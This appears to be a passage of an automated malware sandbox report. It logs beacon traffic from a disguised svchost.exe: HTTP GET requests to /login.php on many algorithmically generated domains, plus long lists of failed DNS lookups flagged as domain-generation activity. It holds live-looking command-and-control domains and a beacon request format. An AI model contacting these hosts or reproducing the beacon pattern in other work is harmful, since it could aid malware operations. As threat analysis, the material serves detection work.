      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431667|1724431667|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431669|1724431669|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431671|1724431621|25|2|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431672|1724431621|25|2|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
      Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyhuv.com replaycode: Server failure (2)
      Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujybig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyvuh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykynon.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
      Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
